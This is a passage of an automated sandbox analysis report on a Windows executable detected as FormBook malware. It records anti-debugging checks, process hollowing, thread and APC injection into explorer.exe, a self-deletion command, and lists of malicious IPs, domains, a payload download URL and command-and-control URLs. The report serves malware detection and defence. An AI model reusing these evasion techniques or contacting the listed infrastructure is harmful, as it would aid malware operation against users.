Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EF51B mov ecx, dword ptr fs:[00000030h] 7_2_1D7EF51B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EF51B mov ecx, dword ptr fs:[00000030h] 7_2_1D7EF51B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EF51B mov eax, dword ptr fs:[00000030h] 7_2_1D7EF51B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EF51B mov eax, dword ptr fs:[00000030h] 7_2_1D7EF51B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EF51B mov eax, dword ptr fs:[00000030h] 7_2_1D7EF51B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EF51B mov eax, dword ptr fs:[00000030h] 7_2_1D7EF51B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EF51B mov eax, dword ptr fs:[00000030h] 7_2_1D7EF51B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73B502 mov eax, dword ptr fs:[00000030h] 7_2_1D73B502
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7F550D mov eax, dword ptr fs:[00000030h] 7_2_1D7F550D
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7F550D mov eax, dword ptr fs:[00000030h] 7_2_1D7F550D
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7F550D mov eax, dword ptr fs:[00000030h] 7_2_1D7F550D
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74B5E0 mov eax, dword ptr fs:[00000030h] 7_2_1D74B5E0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74B5E0 mov eax, dword ptr fs:[00000030h] 7_2_1D74B5E0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74B5E0 mov eax, dword ptr fs:[00000030h] 7_2_1D74B5E0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74B5E0 mov eax, dword ptr fs:[00000030h] 7_2_1D74B5E0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74B5E0 mov eax, dword ptr fs:[00000030h] 7_2_1D74B5E0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74B5E0 mov eax, dword ptr fs:[00000030h] 7_2_1D74B5E0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7715EF mov eax, dword ptr fs:[00000030h] 7_2_1D7715EF
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7C55E0 mov eax, dword ptr fs:[00000030h] 7_2_1D7C55E0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7CB5D3 mov eax, dword ptr fs:[00000030h] 7_2_1D7CB5D3
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F5C7 mov eax, dword ptr fs:[00000030h] 7_2_1D73F5C7
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F5C7 mov eax, dword ptr fs:[00000030h] 7_2_1D73F5C7
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F5C7 mov eax, dword ptr fs:[00000030h] 7_2_1D73F5C7
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F5C7 mov eax, dword ptr fs:[00000030h] 7_2_1D73F5C7
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F5C7 mov eax, dword ptr fs:[00000030h] 7_2_1D73F5C7
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F5C7 mov eax, dword ptr fs:[00000030h] 7_2_1D73F5C7
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F5C7 mov eax, dword ptr fs:[00000030h] 7_2_1D73F5C7
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F5C7 mov eax, dword ptr fs:[00000030h] 7_2_1D73F5C7
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F5C7 mov eax, dword ptr fs:[00000030h] 7_2_1D73F5C7
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D81B55F mov eax, dword ptr fs:[00000030h] 7_2_1D81B55F
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D81B55F mov eax, dword ptr fs:[00000030h] 7_2_1D81B55F
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7E7591 mov edi, dword ptr fs:[00000030h] 7_2_1D7E7591
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D779580 mov eax, dword ptr fs:[00000030h] 7_2_1D779580
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D779580 mov eax, dword ptr fs:[00000030h] 7_2_1D779580
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FF582 mov eax, dword ptr fs:[00000030h] 7_2_1D7FF582
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FF478 mov eax, dword ptr fs:[00000030h] 7_2_1D7FF478
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74D454 mov eax, dword ptr fs:[00000030h] 7_2_1D74D454
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74D454 mov eax, dword ptr fs:[00000030h] 7_2_1D74D454
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74D454 mov eax, dword ptr fs:[00000030h] 7_2_1D74D454
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74D454 mov eax, dword ptr fs:[00000030h] 7_2_1D74D454
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74D454 mov eax, dword ptr fs:[00000030h] 7_2_1D74D454
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74D454 mov eax, dword ptr fs:[00000030h] 7_2_1D74D454
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D77D450 mov eax, dword ptr fs:[00000030h] 7_2_1D77D450
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D77D450 mov eax, dword ptr fs:[00000030h] 7_2_1D77D450
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FD430 mov eax, dword ptr fs:[00000030h] 7_2_1D7FD430
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FD430 mov eax, dword ptr fs:[00000030h] 7_2_1D7FD430
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D777425 mov eax, dword ptr fs:[00000030h] 7_2_1D777425
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D777425 mov ecx, dword ptr fs:[00000030h] 7_2_1D777425
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7CF42F mov eax, dword ptr fs:[00000030h] 7_2_1D7CF42F
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7CF42F mov eax, dword ptr fs:[00000030h] 7_2_1D7CF42F
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7CF42F mov eax, dword ptr fs:[00000030h] 7_2_1D7CF42F
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7CF42F mov eax, dword ptr fs:[00000030h] 7_2_1D7CF42F
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7CF42F mov eax, dword ptr fs:[00000030h] 7_2_1D7CF42F
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73B420 mov eax, dword ptr fs:[00000030h] 7_2_1D73B420
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7C9429 mov eax, dword ptr fs:[00000030h] 7_2_1D7C9429
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7DB420 mov eax, dword ptr fs:[00000030h] 7_2_1D7DB420
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7DB420 mov eax, dword ptr fs:[00000030h] 7_2_1D7DB420
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FF409 mov eax, dword ptr fs:[00000030h] 7_2_1D7FF409
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FF4FD mov eax, dword ptr fs:[00000030h] 7_2_1D7FF4FD
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7694FA mov eax, dword ptr fs:[00000030h] 7_2_1D7694FA
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7754E0 mov eax, dword ptr fs:[00000030h] 7_2_1D7754E0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76F4D0 mov eax, dword ptr fs:[00000030h] 7_2_1D76F4D0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76F4D0 mov eax, dword ptr fs:[00000030h] 7_2_1D76F4D0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76F4D0 mov eax, dword ptr fs:[00000030h] 7_2_1D76F4D0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76F4D0 mov eax, dword ptr fs:[00000030h] 7_2_1D76F4D0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76F4D0 mov eax, dword ptr fs:[00000030h] 7_2_1D76F4D0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76F4D0 mov eax, dword ptr fs:[00000030h] 7_2_1D76F4D0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76F4D0 mov eax, dword ptr fs:[00000030h] 7_2_1D76F4D0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76F4D0 mov eax, dword ptr fs:[00000030h] 7_2_1D76F4D0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76F4D0 mov eax, dword ptr fs:[00000030h] 7_2_1D76F4D0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7614C9 mov eax, dword ptr fs:[00000030h] 7_2_1D7614C9
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7614C9 mov eax, dword ptr fs:[00000030h] 7_2_1D7614C9
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7614C9 mov eax, dword ptr fs:[00000030h] 7_2_1D7614C9
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7614C9 mov eax, dword ptr fs:[00000030h] 7_2_1D7614C9
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7614C9 mov eax, dword ptr fs:[00000030h] 7_2_1D7614C9
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7F54B0 mov eax, dword ptr fs:[00000030h] 7_2_1D7F54B0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7F54B0 mov ecx, dword ptr fs:[00000030h] 7_2_1D7F54B0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7CD4A0 mov ecx, dword ptr fs:[00000030h] 7_2_1D7CD4A0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7CD4A0 mov eax, dword ptr fs:[00000030h] 7_2_1D7CD4A0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7CD4A0 mov eax, dword ptr fs:[00000030h] 7_2_1D7CD4A0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D77B490 mov eax, dword ptr fs:[00000030h] 7_2_1D77B490
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D77B490 mov eax, dword ptr fs:[00000030h] 7_2_1D77B490
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D81B781 mov eax, dword ptr fs:[00000030h] 7_2_1D81B781
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D81B781 mov eax, dword ptr fs:[00000030h] 7_2_1D81B781
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D781763 mov eax, dword ptr fs:[00000030h] 7_2_1D781763
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D781763 mov eax, dword ptr fs:[00000030h] 7_2_1D781763
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D781763 mov eax, dword ptr fs:[00000030h] 7_2_1D781763
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D781763 mov eax, dword ptr fs:[00000030h] 7_2_1D781763
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D781763 mov eax, dword ptr fs:[00000030h] 7_2_1D781763
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D781763 mov eax, dword ptr fs:[00000030h] 7_2_1D781763
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D80D7A7 mov eax, dword ptr fs:[00000030h] 7_2_1D80D7A7
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D80D7A7 mov eax, dword ptr fs:[00000030h] 7_2_1D80D7A7
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D80D7A7 mov eax, dword ptr fs:[00000030h] 7_2_1D80D7A7
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F75B mov eax, dword ptr fs:[00000030h] 7_2_1D73F75B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F75B mov eax, dword ptr fs:[00000030h] 7_2_1D73F75B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F75B mov eax, dword ptr fs:[00000030h] 7_2_1D73F75B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F75B mov eax, dword ptr fs:[00000030h] 7_2_1D73F75B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F75B mov eax, dword ptr fs:[00000030h] 7_2_1D73F75B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F75B mov eax, dword ptr fs:[00000030h] 7_2_1D73F75B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F75B mov eax, dword ptr fs:[00000030h] 7_2_1D73F75B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F75B mov eax, dword ptr fs:[00000030h] 7_2_1D73F75B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73F75B mov eax, dword ptr fs:[00000030h] 7_2_1D73F75B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D773740 mov eax, dword ptr fs:[00000030h] 7_2_1D773740
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7C174B mov eax, dword ptr fs:[00000030h] 7_2_1D7C174B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7C174B mov ecx, dword ptr fs:[00000030h] 7_2_1D7C174B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D77174A mov eax, dword ptr fs:[00000030h] 7_2_1D77174A
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D8117BC mov eax, dword ptr fs:[00000030h] 7_2_1D8117BC
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D769723 mov eax, dword ptr fs:[00000030h] 7_2_1D769723
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FF717 mov eax, dword ptr fs:[00000030h] 7_2_1D7FF717
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74D700 mov ecx, dword ptr fs:[00000030h] 7_2_1D74D700
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73B705 mov eax, dword ptr fs:[00000030h] 7_2_1D73B705
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73B705 mov eax, dword ptr fs:[00000030h] 7_2_1D73B705
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73B705 mov eax, dword ptr fs:[00000030h] 7_2_1D73B705
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73B705 mov eax, dword ptr fs:[00000030h] 7_2_1D73B705
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D80970B mov eax, dword ptr fs:[00000030h] 7_2_1D80970B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D80970B mov eax, dword ptr fs:[00000030h] 7_2_1D80970B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7477F9 mov eax, dword ptr fs:[00000030h] 7_2_1D7477F9
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7477F9 mov eax, dword ptr fs:[00000030h] 7_2_1D7477F9
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7437E4 mov eax, dword ptr fs:[00000030h] 7_2_1D7437E4
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782D10 NtQuerySystemInformation,LdrInitializeThunk, 7_2_1D782D10

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 68.65.122.211 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 41.203.18.177 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 192.64.117.165 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 8A0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Thread register set: target process: 4660 Jump to behavior
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Thread register set: target process: 4660 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 4660 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Process created: C:\Users\user\Desktop\aSsc9zh1ex.exe "C:\Users\user\Desktop\aSsc9zh1ex.exe" Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\aSsc9zh1ex.exe" Jump to behavior
Source: explorer.exe, 0000000A.00000000.42163306046.0000000001A00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.41902575536.0000000001A00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.42029820941.0000000001A00000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 0000000A.00000000.42173257906.0000000005080000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42163306046.0000000001A00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.41928581843.000000000DA0B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.42163306046.0000000001A00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.41902575536.0000000001A00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.42029820941.0000000001A00000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000000.41900925588.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41960830170.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42027095503.00000000013F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman?
Source: explorer.exe, 0000000A.00000000.42163306046.0000000001A00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.41902575536.0000000001A00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.42029820941.0000000001A00000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 1_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_0040350A

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 0000000A.00000000.42010338948.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.46595730295.00000000043D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.42080260452.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.42265914211.000000001D3A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.42240670582.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.46596157164.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 0000000A.00000000.42010338948.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.46595730295.00000000043D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.42080260452.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.42265914211.000000001D3A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.42240670582.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.46596157164.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 625008 Sample: aSsc9zh1ex.exe Startdate: 12/05/2022 Architecture: WINDOWS Score: 100 38 www.rnrr.xyz 2->38 40 www.thebeautystore.store 2->40 42 20 other IPs or domains 2->42 60 Snort IDS alert for network traffic 2->60 62 Found malware configuration 2->62 64 Malicious sample detected (through community Yara rule) 2->64 70 6 other signatures 2->70 11 aSsc9zh1ex.exe 24 2->11         started        signatures3 66 Performs DNS queries to domains with low reputation 38->66 68 Tries to resolve many domain names, but no domain seems valid 40->68 process4 file5 30 C:\Users\...\wxbase30u_xml_gcc_custom.dll, PE32+ 11->30 dropped 32 C:\Users\user\AppData\Local\...\System.dll, PE32 11->32 dropped 34 C:\Users\user\AppData\...\AsSQLHelper.dll, PE32+ 11->34 dropped 36 C:\Users\user\...\AEGISIIINVHelper.dll, PE32+ 11->36 dropped 80 Tries to detect Any.run 11->80 15 aSsc9zh1ex.exe 6 11->15         started        signatures6 process7 dnsIp8 50 barsam.com.au 203.170.86.89, 49758, 80 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU Australia 15->50 52 Modifies the context of a thread in another process (thread injection) 15->52 54 Tries to detect Any.run 15->54 56 Maps a DLL or memory area into another process 15->56 58 2 other signatures 15->58 19 explorer.exe 15->19 injected signatures9 process10 dnsIp11 44 www.fungismartgrid.com 41.203.18.177, 49768, 80 xneeloZA South Africa 19->44 46 herbalsfixng.xyz 192.64.117.165, 49773, 80 NAMECHEAP-NETUS United States 19->46 48 4 other IPs or domains 19->48 72 System process connects to network (likely due to code injection or exploit) 19->72 23 rundll32.exe 19->23         started        signatures12 process13 signatures14 74 Self deletion via cmd delete 23->74 76 Modifies the context of a thread in another process (thread injection) 23->76 78 Maps a DLL or memory area into another process 23->78 26 cmd.exe 1 23->26         started        process15 process16 28 conhost.exe 26->28         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
41.203.18.177
 www.fungismartgrid.com South Africa
37153 xneeloZA true
68.65.122.211
 schnellekreditfinanz.com United States
22612 NAMECHEAP-NETUS true
23.227.38.74
 shops.myshopify.com Canada
13335 CLOUDFLARENETUS true
3.64.163.50
 www.intelios.xyz United States
16509 AMAZON-02US true
192.64.117.165
 herbalsfixng.xyz United States
22612 NAMECHEAP-NETUS true
203.170.86.89
 barsam.com.au Australia
38719 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU true
93.184.220.29
 unknown European Union
15133 EDGECASTUS false

Contacted Domains

Name IP Active
www.intelios.xyz 3.64.163.50 true
herbalsfixng.xyz 192.64.117.165 true
schnellekreditfinanz.com 68.65.122.211 true
www.fungismartgrid.com 41.203.18.177 true
barsam.com.au 203.170.86.89 true
shops.myshopify.com 23.227.38.74 true
www.kbcoastalproperties.com unknown unknown
www.sura.ooo unknown unknown
www.shantelleketodietofficial.site unknown unknown
www.threads34.store unknown unknown
www.taakyif.com unknown unknown
www.schnellekreditfinanz.com unknown unknown
www.hokasneakeruse.xyz unknown unknown
www.perrobravostudio.com unknown unknown
www.reionsbank.com unknown unknown
www.nelvashop.com unknown unknown
www.rnrr.xyz unknown unknown
www.ayanaslifeinmalaysia.com unknown unknown
www.thebeautystore.store unknown unknown
www.herbalsfixng.xyz unknown unknown
www.gpusforfun.com unknown unknown
www.liesdevocalist.store unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://barsam.com.au/bin_QuCucbUMda229.bin true
  • Avira URL Cloud: safe
 unknown
http://www.intelios.xyz/wn19/?jZf=QQL+SjwgUyPYxJnw2qa+Hze/zpoAw1vY2ZXVt5QHdkoKCL+B47r8V4uCmI0quTqEBnpn&1biX=C2MPnN true
  • Avira URL Cloud: safe
 unknown
http://www.threads34.store/wn19/?jZf=rv1HgXCmNvTRWnk0t/PWMZTArWSxwY6VToXu23C5wd0SYVqo5hbnUnFufPtPTohMYlmc&k0=p8cH true
  • Avira URL Cloud: safe
 unknown
www.shantelleketodietofficial.site/wn19/ true
  • Avira URL Cloud: safe
 low
